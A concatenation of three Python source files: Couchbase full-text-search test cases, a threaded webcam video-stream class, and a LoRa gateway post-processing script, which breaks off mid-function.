n1ql_query = "select b, search_meta(b.oouutt) as meta from default b where " \
"search(b, {\"query\": " + json.dumps(
query) + ", \"explain\": true, \"highlight\": {}},{\"out\": \"oouutt\"})"
n1ql_results = self._cb_cluster.run_n1ql_query(query=n1ql_query)
hits, contents, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True,
highlight=True,
highlight_style=self.highlight_style,
highlight_fields=self.highlight_fields_list)
self.log.info("Hits: %s" % hits)
self.log.info("Content: %s" % contents)
result = True
self.expected_results = json.loads(self.expected_results)
if hits:
for expected_doc in self.expected_results:
result &= index.validate_snippet_highlighting_in_result_content(
contents, expected_doc['doc_id'],
expected_doc['field_name'], expected_doc['term'],
highlight_style=self.highlight_style)
if self.run_via_n1ql:
result &= index.validate_snippet_highlighting_in_result_content_n1ql(
n1ql_results['results'], expected_doc['doc_id'],
expected_doc['field_name'], expected_doc['term'],
highlight_style=self.highlight_style)
if not result:
self.fail(
"Testcase failed. Actual results do not match expected.")
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + err.message)
def test_geo_query(self):
"""
Tests both geo location and bounding box queries
compares results against ES
:return: Nothing
"""
geo_index = self.create_geo_index_and_load()
self.generate_random_geo_queries(geo_index, self.num_queries)
if self.run_via_n1ql:
n1ql_executor = self._cb_cluster
else:
n1ql_executor = None
self.run_query_and_compare(geo_index, n1ql_executor=n1ql_executor)
def test_sort_geo_query(self):
"""
Generate random geo location queries and compare the results against
Elasticsearch
:return: Nothing
"""
geo_index = self.create_geo_index_and_load()
from random_query_generator.rand_query_gen import FTSESQueryGenerator
testcase_failed = False
for i in range(self.num_queries):
self.log.info("Running Query no --> " + str(i))
fts_query, es_query = FTSESQueryGenerator.construct_geo_location_query()
            self.log.info(fts_query)
            self.log.info("fts_query location ---> " + str(fts_query["location"]))
# If query has geo co-ordinates in form of an object
if "lon" in fts_query["location"]:
lon = fts_query["location"]["lon"]
lat = fts_query["location"]["lat"]
# If query has geo co-ordinates in form of a list
elif isinstance(fts_query["location"],list):
lon = fts_query["location"][0]
lat = fts_query["location"][1]
# If query has geo co-ordinates in form of a string or geohash
elif isinstance(fts_query["location"],str):
# If the location is in string format
if "," in fts_query["location"]:
lat = float(fts_query["location"].split(",")[0])
lon = float(fts_query["location"].split(",")[1])
else:
lat = float(Geohash.decode(fts_query["location"])[0])
lon = float (Geohash.decode(fts_query["location"])[1])
unit = fts_query["distance"][-2:]
location = None
case = random.randint(0, 3)
# Geo location as an object
if case == 0:
location = {"lon": lon,
"lat": lat}
# Geo Location as array
if case == 1:
location = [lon, lat]
# Geo Location as string
if case == 2:
location = "{0},{1}".format(lat, lon)
# Geo Location as Geohash
if case == 3:
geohash = Geohash.encode(lat, lon, precision=random.randint(3, 8))
location = geohash
print "sort_fields_location ----> " + str(location)
sort_fields = [
{
"by": "geo_distance",
"field": "geo",
"unit": unit,
"location": location
}
]
hits, doc_ids, _, _ = geo_index.execute_query(
query=fts_query,
sort_fields=sort_fields)
self.log.info("Hits from FTS: {0}".format(hits))
self.log.info("First 50 docIDs: {0}". format(doc_ids[:50]))
sort_fields_es = [
{
"_geo_distance": {
"geo": location,
"order": "asc",
"unit": unit
}
}
]
es_query["sort"] = sort_fields_es
hits2, doc_ids2, _ = self.es.search(index_name="es_index",
query=es_query)
self.log.info("Hits from ES: {0}".format(hits2))
self.log.info("First 50 doc_ids: {0}".format(doc_ids2[:50]))
if doc_ids==doc_ids2:
self.log.info("PASS: Sort order matches!")
else:
msg = "FAIL: Sort order mismatch!"
self.log.error(msg)
testcase_failed = True
self.log.info("--------------------------------------------------"
"--------------------------------------------------")
if testcase_failed:
self.fail(msg)
def test_xattr_support(self):
"""
Tests if setting includeXAttrs in index definition
breaks anything
:return: Nothing
"""
self.load_data()
index = self._cb_cluster.create_fts_index(
name='default_index',
source_name='default',
source_params={"includeXAttrs": True})
self.is_index_partitioned_balanced(index)
self.wait_for_indexing_complete()
if self._update or self._delete:
self.async_perform_update_delete(self.upd_del_fields)
if self._update:
self.sleep(60, "Waiting for updates to get indexed...")
self.wait_for_indexing_complete()
self.generate_random_queries(index, self.num_queries, self.query_types)
self.run_query_and_compare(index)
def test_ssl(self):
"""
Tests if we are able to create an index and query over ssl port
:return: Nothing
"""
fts_ssl_port=18094
import json, subprocess
idx = {"sourceName": "default",
"sourceType": "couchbase",
"type": "fulltext-index"}
qry = {"indexName": "default_index_1",
"query": {"field": "type", "match": "emp"},
"size": 10000000}
self.load_data()
cert = RestConnection(self._master).get_cluster_ceritificate()
f = open('cert.pem', 'w')
f.write(cert)
f.close()
cmd = "curl -g -k "+\
"-XPUT -H \"Content-Type: application/json\" "+\
"-u Administrator:password "+\
"https://{0}:{1}/api/index/default_idx -d ".\
format(self._master.ip, fts_ssl_port) +\
"\'{0}\'".format(json.dumps(idx))
self.log.info("Running command : {0}".format(cmd))
output = subprocess.check_output(cmd, shell=True)
if json.loads(output) == {"status":"ok"}:
query = "curl -g -k " + \
"-XPOST -H \"Content-Type: application/json\" " + \
"-u Administrator:password " + \
"https://{0}:18094/api/index/default_idx/query -d ". \
format(self._master.ip, fts_ssl_port) + \
"\'{0}\'".format(json.dumps(qry))
self.sleep(20, "wait for indexing to complete")
output = subprocess.check_output(query, shell=True)
self.log.info("Hits: {0}".format(json.loads(output)["total_hits"]))
if int(json.loads(output)["total_hits"]) != 1000:
self.fail("Query over ssl failed!")
else:
self.fail("Index could not be created over ssl")
def test_json_types(self):
import couchbase
self.load_data()
self.create_simple_default_index()
master = self._cb_cluster.get_master_node()
dic ={}
dic['null'] = None
dic['number'] = 12345
dic['date'] = "2018-01-21T18:25:43-05:00"
dic['bool'] = True
dic['string'] = "sample string json"
dic['array'] = ['element1', 1234, True]
try:
from couchbase.cluster import Cluster
from couchbase.cluster import PasswordAuthenticator
cluster = Cluster('couchbase://{0}'.format(master.ip))
authenticator = PasswordAuthenticator('Administrator', 'password')
cluster.authenticate(authenticator)
cb = cluster.open_bucket('default')
for key, value in dic.iteritems():
cb.upsert(key, value)
except Exception as e:
self.fail(e)
self.wait_for_indexing_complete()
self.validate_index_count(equal_bucket_doc_count=True)
for index in self._cb_cluster.get_indexes():
self.generate_random_queries(index, 5, self.query_types)
self.run_query_and_compare(index)
# This test is to validate if the value for score is 0 for all docs when score=none is specified in the search query.
def test_score_none(self):
# Create bucket, create index
self.load_data()
self.wait_till_items_in_bucket_equal(items=self._num_items / 2)
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
default_query = {"match": "Safiya", "field": "name"}
query = eval(self._input.param("query", str(default_query)))
if expected_hits:
zero_results_ok = False
if isinstance(query, str):
query = json.loads(query)
try:
for index in self._cb_cluster.get_indexes():
hits, contents, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True,
score="none")
self.log.info("Hits: %s" % hits)
self.log.info("Content: %s" % contents)
result = True
if hits == expected_hits:
for doc in contents:
# Check if the score of the doc is 0.
if "score" in doc:
self.assertEqual(doc["score"], 0, "Score is not 0 for doc {0}".format(doc["id"]))
else:
self.fail("Score key not present in search results for doc {0}".format(doc["id"]))
if not result:
self.fail(
"Testcase failed. Actual results do not match expected.")
else:
self.fail("No. of hits not matching expected hits. Hits = {0}, Expected Hits = {1}".format(hits,
expected_hits))
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + err.message)
# This test checks the correctness of search results from queries with score=none and without score=none.
def test_result_correctness_score_none(self):
# Create bucket, create index
self.load_data()
self.wait_till_items_in_bucket_equal(items=self._num_items / 2)
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
default_query = {"match": "Safiya", "field": "name"}
query = eval(self._input.param("query", str(default_query)))
if expected_hits:
zero_results_ok = False
if isinstance(query, str):
query = json.loads(query)
try:
for index in self._cb_cluster.get_indexes():
hits, doc_ids_with_score_none, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
return_raw_hits=False,
score="none")
self.log.info("Hits: %s" % hits)
self.log.info("Docs: %s" % doc_ids_with_score_none)
doc_ids_with_score_none.sort()
hits, doc_ids_without_score_none, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
return_raw_hits=False)
self.log.info("Hits: %s" % hits)
self.log.info("Docs: %s" % doc_ids_without_score_none)
doc_ids_without_score_none.sort()
self.assertListEqual(doc_ids_with_score_none, doc_ids_without_score_none, "Doc Ids not equal")
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + err.message)
# Tests the ASCII folding filter with different types of accented characters
def test_ascii_folding_filter(self):
# Reference for test data : http://www.jarte.com/help_new/accent_marks_diacriticals_and_special_characters.html
test_data = [
{"text": "Ápple"},
{"text": "Àpple"},
{"text": "Äpple"},
{"text": "Âpple"},
{"text": "Ãpple"},
{"text": "Åpple"},
{"text": "ápple"},
{"text": "àpple"},
{"text": "äpple"},
{"text": "âpple"},
{"text": "ãpple"},
{"text": "åpple"},
{"text": "Ðodge"},
{"text": "ðodge"},
{"text": "Élephant"},
{"text": "élephant"},
{"text": "Èlephant"},
{"text": "èlephant"},
{"text": "Ëlephant"},
{"text": "ëlephant"},
{"text": "Êlephant"},
{"text": "êlephant"},
{"text": "Íceland"},
{"text": "íceland"},
{"text": "Ìceland"},
{"text": "ìceland"},
{"text": "Ïceland"},
{"text": "ïceland"},
{"text": "Îceland"},
{"text": "îceland"},
{"text": "Órange"},
{"text": "órange"},
{"text": "Òrange"},
{"text": "òrange"},
{"text": "Örange"},
{"text": "örange"},
{"text": "Ôrange"},
{"text": "ôrange"},
{"text": "Õrange"},
{"text": "õrange"},
{"text": "Ørange"},
{"text": "ørange"},
{"text": "Únicorn"},
{"text": "únicorn"},
{"text": "Ùnicorn"},
{"text": "ùnicorn"},
{"text": "Ünicorn"},
{"text": "ünicorn"},
{"text": "Ûnicorn"},
{"text": "ûnicorn"},
{"text": "Ýellowstone"},
{"text": "ýellowstone"},
{"text": "Ÿellowstone"},
{"text": "ÿellowstone"},
{"text": "Ñocturnal"},
{"text": "ñocturnal"},
{"text": "Çelcius"},
{"text": "çelcius"},
{"text": "Œlcius"},
{"text": "œlcius"},
{"text": "Šmall"},
{"text": "šmall"},
{"text": "Žebra"},
{"text": "žebra"},
{"text": "Æsthetic"},
{"text": "æsthetic"},
{"text": "Þhonetic"},
{"text": "þhonetic"},
{"text": "Discuß"},
{"text": "ÆꜴ"}
]
search_terms = [
{"term": "apple", "expected_hits": 6},
{"term": "Apple", "expected_hits": 6},
{"term": "dodge", "expected_hits": 1},
{"term": "Dodge", "expected_hits": 1},
{"term": "Elephant", "expected_hits": 4},
{"term": "elephant", "expected_hits": 4},
{"term": "iceland", "expected_hits": 4},
{"term": "Iceland", "expected_hits": 4},
{"term": "orange", "expected_hits": 6},
{"term": "Orange", "expected_hits": 6},
{"term": "unicorn", "expected_hits": 4},
{"term": "Unicorn", "expected_hits": 4},
{"term": "yellowstone", "expected_hits": 2},
{"term": "Yellowstone", "expected_hits": 2},
{"term": "nocturnal", "expected_hits": 1},
{"term": "Nocturnal", "expected_hits": 1},
{"term": "celcius", "expected_hits": 1},
{"term": "Celcius", "expected_hits": 1},
{"term": "oelcius", "expected_hits": 1},
{"term": "OElcius", "expected_hits": 1},
{"term": "small", "expected_hits": 1},
{"term": "Small", "expected_hits": 1},
{"term": "zebra", "expected_hits": 1},
{"term": "Zebra", "expected_hits": 1},
{"term": "aesthetic", "expected_hits": 1},
{"term": "AEsthetic", "expected_hits": 1},
{"term": "thhonetic", "expected_hits": 1},
{"term": "THhonetic", "expected_hits": 1},
{"term": "Discuss", "expected_hits": 1},
{"term": "AEAO", "expected_hits": 1}
]
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
# Update index to have the child field "text"
index.add_child_field_to_default_mapping("text", "text")
index.index_definition['uuid'] = index.get_uuid()
index.update()
# Update index to have a custom analyzer which uses the ascii folding filter as a char filter
index.index_definition["params"]["mapping"]["analysis"] = {}
index.index_definition["params"]["mapping"]["analysis"] = json.loads(
"{\"analyzers\": {\"asciiff\": {\"char_filters\": [\"asciifolding\"],\"tokenizer\": \"letter\",\"type\": \"custom\" }}}")
index.index_definition["params"]["mapping"]["default_analyzer"] = "asciiff"
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.wait_for_indexing_complete()
# Run queries
try:
for index in self._cb_cluster.get_indexes():
all_queries_passed = True
failed_search_terms = []
for search_term in search_terms:
self.log.info("=============== Querying for term {0} ===============".format(search_term["term"]))
query = {'match': search_term["term"], 'field': 'text'}
expected_hits = search_term["expected_hits"]
hits, contents, _, _ = index.execute_query(query=query,
zero_results_ok=True,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Content: %s" % contents)
if hits != expected_hits:
all_queries_passed = False
failed_search_terms.append(search_term["term"])
self.assertTrue(all_queries_passed,
"All search terms did not return expected results. Terms for which queries failed : {0}".format(
str(failed_search_terms)))
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + err.message)
|
webcamvideostream.py
|
# import the necessary packages
from threading import Thread
import cv2
class WebcamVideoStream:
def __init__(self, src=0, name="WebcamVideoStream", resolution=(320, 240)):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
		self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, int(resolution[0]))
		self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, int(resolution[1]))
(self.grabbed, self.frame) = self.stream.read()
# initialize the thread name
self.name = name
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
t = Thread(target=self.update, name=self.name, args=())
t.daemon = True
t.start()
return self
	def update(self):
		# keep looping infinitely until the thread is stopped
		while True:
			# if the thread indicator variable is set, release the
			# camera handle and stop the thread
			if self.stopped:
				self.stream.release()
				return
			# otherwise, read the next frame from the stream
			(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
	def stop(self):
		# indicate that the thread should be stopped; update() releases
		# the camera once it sees the flag, so the capture is never
		# released while the worker thread is still reading from it
		self.stopped = True
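
# Minimal usage sketch (illustrative only, not part of the original module):
# grab a few frames from the threaded stream, then stop it. Assumes a webcam
# is available at index 0; read() may return None if the camera fails to open.
if __name__ == "__main__":
	import time
	vs = WebcamVideoStream(src=0, resolution=(320, 240)).start()
	time.sleep(1.0)  # give the capture thread time to warm up
	for _ in range(30):
		frame = vs.read()
		if frame is not None:
			print("frame shape: {0}".format(frame.shape))
		time.sleep(0.1)
	vs.stop()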
|
post_processing_gw.py
|
#------------------------------------------------------------
# Copyright 2017 Congduc Pham, University of Pau, France.
#
# Congduc.Pham@univ-pau.fr
#
# This file is part of the low-cost LoRa gateway developed at the University of Pau
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with the program. If not, see <http://www.gnu.org/licenses/>.
#
# v3.8 - image modification and need to incorporate aux_radio features
# + copy post-processing feature
#------------------------------------------------------------
# IMPORTANT NOTE
# Parts that can be modified are identified with
#////////////////////////////////////////////////////////////
# TEXT
# END
#////////////////////////////////////////////////////////////
dateutil_tz=True
import sys
import subprocess
import select
import threading
from threading import Timer
import time
from collections import deque
import datetime
try:
import dateutil.tz
except ImportError:
print "no timezone support, time will be expressed only in local time"
dateutil_tz=False
import getopt
import os
import os.path
import json
import re
import string
import base64
import requests
import libSMS
#////////////////////////////////////////////////////////////
# ADD HERE VARIABLES FOR YOUR OWN NEEDS
#////////////////////////////////////////////////////////////
#////////////////////////////////////////////////////////////
#------------------------------------------------------------
#low-level data prefix
#------------------------------------------------------------
LL_PREFIX_1='\xFF'
LL_PREFIX_LORA='\xFE'
#add here other data prefix for other type of low-level radio gateway
#list here other radio type
LORA_RADIO=1
#will be dynamically determined according to the second data prefix
radio_type=LORA_RADIO
#------------------------------------------------------------
#LoRa header packet information
#------------------------------------------------------------
HEADER_SIZE=4
APPKEY_SIZE=4
PKT_TYPE_DATA=0x10
PKT_TYPE_ACK=0x20
PKT_FLAG_ACK_REQ=0x08
PKT_FLAG_DATA_ENCRYPTED=0x04
PKT_FLAG_DATA_WAPPKEY=0x02
PKT_FLAG_DATA_DOWNLINK=0x01
LORAWAN_HEADER_SIZE=13
#------------------------------------------------------------
#last pkt information
#------------------------------------------------------------
pdata="0,0,0,0,0,0,0,0"
rdata="0,0,0"
tdata="N/A"
dst=0
ptype=0
ptypestr="N/A"
src=0
seq=0
datalen=0
SNR=0
RSSI=0
bw=0
cr=0
sf=0
_hasRadioData=False
#------------------------------------------------------------
#to display non printable characters
replchars = re.compile(r'[\x00-\x1f]')
def replchars_to_hex(match):
return r'\x{0:02x}'.format(ord(match.group()))
#------------------------------------------------------------
#will ignore lines beginning with '?'
#------------------------------------------------------------
_ignoreComment=1
#------------------------------------------------------------
#for appkey management
#------------------------------------------------------------
the_app_key = '\x00\x00\x00\x00'
#valid app key? by default we do not check for the app key
_validappkey=1
#------------------------------------------------------------
#for local AES decrypting
#------------------------------------------------------------
_hasClearData=0
#------------------------------------------------------------
#open gateway_conf.json file
#------------------------------------------------------------
f = open(os.path.expanduser("gateway_conf.json"),"r")
lines = f.readlines()
f.close()
array = ""
#get all the lines in a string
for line in lines :
array += line
#change it into a python array
json_array = json.loads(array)
#------------------------------------------------------------
#get gateway ID
#------------------------------------------------------------
#set the gateway_address for having different log filenames
_gwid = json_array["gateway_conf"]["gateway_ID"]
#------------------------------------------------------------
#raw format?
#------------------------------------------------------------
try:
_rawFormat = json_array["gateway_conf"]["raw"]
except KeyError:
_rawFormat = 0
if _rawFormat:
print "raw output from low-level gateway. post_processing_gw will handle packet format"
#------------------------------------------------------------
#local aes?
#------------------------------------------------------------
try:
_local_aes = json_array["gateway_conf"]["aes"]
except KeyError:
_local_aes = 0
if _local_aes:
print "enable local AES decryption"
#------------------------------------------------------------
#with app key?
#------------------------------------------------------------
try:
_wappkey = json_array["gateway_conf"]["wappkey"]
except KeyError:
_wappkey = 0
if _wappkey:
print "will enforce app key"
print "importing list of app key"
try:
import key_AppKey
except ImportError:
print "no key_AppKey.py file"
_wappkey = 0
#------------------------------------------------------------
#initialize gateway DHT22 sensor
#------------------------------------------------------------
try:
_gw_dht22 = json_array["gateway_conf"]["dht22"]
except KeyError:
_gw_dht22 = 0
if _gw_dht22 < 0:
_gw_dht22 = 0
_date_save_dht22 = None
try:
_dht22_mongo = json_array["gateway_conf"]["dht22_mongo"]
except KeyError:
_dht22_mongo = False
if (_dht22_mongo):
global add_document
from MongoDB import add_document
if (_gw_dht22):
print "Use DHT22 to get gateway temperature and humidity level"
#read values from dht22 in the gateway box
sys.path.insert(0, os.path.expanduser('./sensors_in_raspi/dht22'))
from read_dht22 import get_dht22_values
_temperature = 0
_humidity = 0
# retrieve dht22 values
def save_dht22_values():
global _temperature, _humidity, _date_save_dht22
_humidity, _temperature = get_dht22_values()
_date_save_dht22 = datetime.datetime.now()
print "Gateway TC : "+_temperature+" C | HU : "+_humidity+" % at "+str(_date_save_dht22)
#save values from the gateway box's DHT22 sensor, if _mongodb is true
if(_dht22_mongo):
#saving data in a JSON var
str_json_data = "{\"th\":"+_temperature+", \"hu\":"+_humidity+"}"
#creating document to add
doc = {
"type" : "DATA_GW_DHT22",
"gateway_eui" : _gwid,
"node_eui" : "gw",
"snr" : "",
"rssi" : "",
"cr" : "",
"datarate" : "",
"time" : _date_save_dht22,
"data" : json.dumps(json.loads(str_json_data))
}
#adding the document
add_document(doc)
def dht22_target():
while True:
print "Getting gateway temperature"
save_dht22_values()
sys.stdout.flush()
global _gw_dht22
time.sleep(_gw_dht22)
#------------------------------------------------------------
#copy post-processing.log into /var/www/html/admin/log folder
#------------------------------------------------------------
#you can enable periodic copy of post-processing.log file by setting to True
#but you need to install the web admin interface in order to have the /var/www/html/admin/log/ folder
#note that this feature is obsoleted by an option in the web admin interface to copy post-processing.log file on demand
_gw_copy_post_processing=False
#TODO: integrate copy post_processing feature into periodic status/tasks?
def copy_post_processing():
print "extract last 500 lines of post-processing.log into /var/www/html/admin/log/post-processing-500L.log"
cmd="sudo tail -n 500 log/post-processing.log > /var/www/html/admin/log/post-processing-500L.log"
try:
os.system(cmd)
except:
print "Error when extracting lines from post-processing_"+_gwid+".log"
cmd="sudo chown -R pi:www-data /var/www/html/admin/log"
try:
os.system(cmd)
except:
print "Error when setting file ownership to pi:www-data"
def copy_post_processing_target():
while True:
copy_post_processing()
sys.stdout.flush()
		#change here if you want to change the time between 2 extractions
#here it is 30mins
time.sleep(1800)
#------------------------------------------------------------
#for downlink features
#------------------------------------------------------------
try:
_gw_downlink = json_array["gateway_conf"]["downlink"]
except KeyError:
_gw_downlink = 0
if _gw_downlink < 0:
_gw_downlink = 0
_post_downlink_file = "downlink/downlink-post.txt"
_post_downlink_queued_file = "downlink/downlink-post-queued.txt"
_gw_downlink_file = "downlink/downlink.txt"
pending_downlink_requests = []
#actually, periodic output for downlink may not be very convenient
#as typical value for checking downlink is 1 to 5 minutes
#so we disable it here
_verbose_downlink=False
#if we check every hour, then switch output on
#you can also disable this behavior
if _gw_downlink > 3600:
_verbose_downlink=True
def check_downlink():
	# - post_processing_gw.py checks and uses downlink/downlink-post.txt as input
	# - post_processing_gw.py will maintain a list of downlink message requests by reading downlink/downlink-post.txt
	# - valid requests will be appended to downlink/downlink-post-queued.txt
	# - after reading downlink/downlink-post.txt, post_processing_gw.py deletes it
	# - when a packet from device i is processed by post_processing_gw.py, it will check whether there is a queued message for i
	# - if yes, then it generates a downlink/downlink.txt file with the queued message as content
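	# an input line is a one-line JSON object; illustrative example (values made up),
	# using the keys actually read below ("status", "dst", "data"):
	#   {"status":"send_request","dst":3,"data":"hello"}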
if _verbose_downlink:
print datetime.datetime.now()
print "post downlink: checking for "+_post_downlink_file
if os.path.isfile(os.path.expanduser(_post_downlink_file)):
lines = []
print "post downlink: reading "+_post_downlink_file
f = open(os.path.expanduser(_post_downlink_file),"r")
lines = f.readlines()
f.close()
for line in lines:
		#remove \r=0x0D from line if some are inserted by the OS and various tools
line = line.replace('\r','')
if len(line) > 1 or line != '\n':
line_json=json.loads(line)
print line_json
if line_json["status"]=="send_request":
pending_downlink_requests.append(line)
#print pending_downlink_request
print "post downlink: writing to "+_post_downlink_queued_file
f = open(os.path.expanduser(_post_downlink_queued_file),"w")
for downlink_request in pending_downlink_requests:
f.write("%s" % downlink_request)
os.remove(os.path.expanduser(_post_downlink_file))
else:
if _verbose_downlink:
print "post downlink: no downlink requests"
if _verbose_downlink:
print "post downlink: list of pending downlink requests"
if len(pending_downlink_requests) == 0:
print "None"
else:
for downlink_request in pending_downlink_requests:
print downlink_request.replace('\n','')
def downlink_target():
while True:
check_downlink()
sys.stdout.flush()
global _gw_downlink
time.sleep(_gw_downlink)
#------------------------------------------------------------
#for doing periodic status/tasks
#------------------------------------------------------------
try:
_gw_status = json_array["gateway_conf"]["status"]
except KeyError:
_gw_status = 0
if _gw_status < 0:
_gw_status = 0
# if _gw_status:
# try:
# _gw_lat = json_array["gateway_conf"]["ref_latitude"]
# except KeyError:
# _gw_lat = "undef"
# try:
# _gw_long = json_array["gateway_conf"]["ref_longitude"]
# except KeyError:
# _gw_long = "undef"
def status_target():
while True:
print datetime.datetime.now()
print 'post status: gw ON'
if _gw_downlink:
print 'post status: will check for downlink requests every %d seconds' % _gw_downlink
print 'post status: executing periodic tasks'
sys.stdout.flush()
try:
os.system('python post_status_processing_gw.py')
except:
print "Error when executing post_status_processing_gw.py"
global _gw_status
time.sleep(_gw_status)
#------------------------------------------------------------
#check Internet connectivity
#------------------------------------------------------------
def checkNet():
print "post_processing_gw.py checks Internet connecitivity with www.google.com"
try:
response = requests.get("http://www.google.com")
print "response code: " + str(response.status_code)
return True
except requests.ConnectionError:
print "No Internet"
return False
#------------------------------------------------------------
#check for alert_conf.json section
#------------------------------------------------------------
try:
alert_conf=json_array["alert_conf"]
_has_alert_conf = True
print "post_processing_gw.py found an alert_conf section"
except KeyError:
_has_alert_conf = False
#------------------------------------------------------------
#for mail alerting
#------------------------------------------------------------
#got example from https://myhydropi.com/send-email-with-a-raspberry-pi-and-python
_use_mail_alert = False
if _has_alert_conf:
#global _use_mail_alert
_use_mail_alert = json_array["alert_conf"]["use_mail"]
if _use_mail_alert:
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
print "Alert by mail is ON. Contact mail is "+json_array["alert_conf"]["contact_mail"]
def send_alert_mail(m):
fromaddr = json_array["alert_conf"]["mail_from"]
toaddr = json_array["alert_conf"]["contact_mail"]
#in case we have several contact mail separated by ','
alladdr=toaddr.split(",")
msg = MIMEMultipart()
msg['From'] = fromaddr
msg['To'] = toaddr
msg['Subject'] = m
body = m
msg.attach(MIMEText(body, 'plain'))
server = smtplib.SMTP(json_array["alert_conf"]["mail_server"], 587)
server.starttls()
server.login(fromaddr, json_array["alert_conf"]["mail_passwd"])
text = msg.as_string()
server.sendmail(fromaddr, alladdr, text)
server.quit()
if _use_mail_alert :
print "post_processing_gw.py sends mail indicating that gateway has started post-processing stage..."
if checkNet():
try:
send_alert_mail("Gateway "+_gwid+" has started post-processing stage")
print "Sending mail done"
except:
print "Unexpected error when sending mail"
sys.stdout.flush()
#------------------------------------------------------------
#for SMS alerting
#------------------------------------------------------------
_use_sms_alert = False
if _has_alert_conf:
#global _use_sms_alert
_use_sms_alert = json_array["alert_conf"]["use_sms"]
global PIN, contact_sms, gammurc_file, sm
if _use_sms_alert:
#check Gammu configuration
if (not libSMS.gammuCheck()):
print "overriding use_sms to false"
_use_sms_alert = False
if _use_sms_alert:
PIN = json_array["alert_conf"]["pin"]
contact_sms = json_array["alert_conf"]["contact_sms"]
gammurc_file = json_array["alert_conf"]["gammurc_file"]
if (libSMS.gammurcCheck(gammurc_file)):
print "Alert by SMS is ON. Contact SMS is ",
print contact_sms
print "Initializing gammu for SMS"
else:
print "overriding use_sms to false"
_use_sms_alert = False
if _use_sms_alert:
	#open the phone connection only once and reuse the handler
	sm = libSMS.phoneConnection(gammurc_file, PIN)
	if sm is None:
		print "overriding use_sms to false"
		print "Sending SMS failed"
		_use_sms_alert = False
if _use_sms_alert :
print "post_processing_gw.py sends SMS indicating that gateway has started post-processing stage..."
success = libSMS.send_sms(sm, "Gateway "+_gwid+" has started post-processing stage", contact_sms)
if (success):
print "Sending SMS done"
sys.stdout.flush()
#------------------------------------------------------------
#for handling images
#------------------------------------------------------------
#list of active nodes
nodeL = deque([])
#association to get the file handler
fileH = {}
#association to get the image filename
imageFilenameA = {}
#association to get the image SN
imgsnA= {}
#association to get the image quality factor
qualityA = {}
#association to get the cam id
camidA = {}
#global image seq number
imgSN=0
def image_timeout():
#get the node which timer has expired first
#i.e. the one that received image packet earlier
node_id=nodeL.popleft()
print "close image file for node %d" % node_id
f=fileH[node_id]
f.close()
del fileH[node_id]
print "decoding image "+os.path.expanduser(imageFilenameA[node_id])
sys.stdout.flush()
cmd = '/home/pi/lora_gateway/ucam-images/decode_to_bmp -received '+os.path.expanduser(imageFilenameA[node_id])+\
' -SN '+str(imgsnA[node_id])+\
' -src '+str(node_id)+\
' -camid '+str(camidA[node_id])+\
' -Q '+str(qualityA[node_id])+\
' -vflip'+\
' /home/pi/lora_gateway/ucam-images/128x128-test.bmp'
print "decoding with command"
print cmd
args = cmd.split()
out = 'error'
try:
out = subprocess.check_output(args, stderr=None, shell=False)
if (out=='error'):
print "decoding error"
else:
# leave enough time for the decoding program to terminate
time.sleep(3)
out = out.replace('\r','')
out = out.replace('\n','')
print "producing file " + out
print "creating if needed the uploads/node_"+str(node_id)+" folder"
try:
os.mkdir(os.path.expanduser(_web_folder_path+"images/uploads/node_"+str(node_id)))
except OSError:
print "folder already exist"
print "moving decoded image file into " + os.path.expanduser(_web_folder_path+"images/uploads/node_"+str(node_id))
os.rename(os.path.expanduser("./"+out), os.path.expanduser(_web_folder_path+"images/uploads/node_"+str(node_id)+"/"+out))
print "done"
except subprocess.CalledProcessError:
print "launching image decoding failed!"
sys.stdout.flush()
#------------------------------------------------------------
#for managing the input data when we can have aes encryption
#------------------------------------------------------------
_linebuf="the line buffer"
_linebuf_idx=0
_has_linebuf=0
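#when local AES decryption succeeds, the clear payload replaces the raw radio payload:
#it is stored in _linebuf with _has_linebuf set, so getSingleChar()/getAllLine()
#transparently serve characters from this buffer instead of stdin until it is exhausted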
def getSingleChar():
global _has_linebuf
#if we have a valid _linebuf then read from _linebuf
if _has_linebuf==1:
global _linebuf_idx
global _linebuf
if _linebuf_idx < len(_linebuf):
_linebuf_idx = _linebuf_idx + 1
return _linebuf[_linebuf_idx-1]
else:
#no more character from _linebuf, so read from stdin
_has_linebuf = 0
return sys.stdin.read(1)
else:
return sys.stdin.read(1)
def getAllLine():
global _linebuf_idx
p=_linebuf_idx
_linebuf_idx = 0
global _has_linebuf
_has_linebuf = 0
global _linebuf
#return the remaining of the string and clear the _linebuf
return _linebuf[p:]
def fillLinebuf(n):
global _linebuf_idx
_linebuf_idx = 0
global _has_linebuf
_has_linebuf = 1
global _linebuf
#fill in our _linebuf from stdin
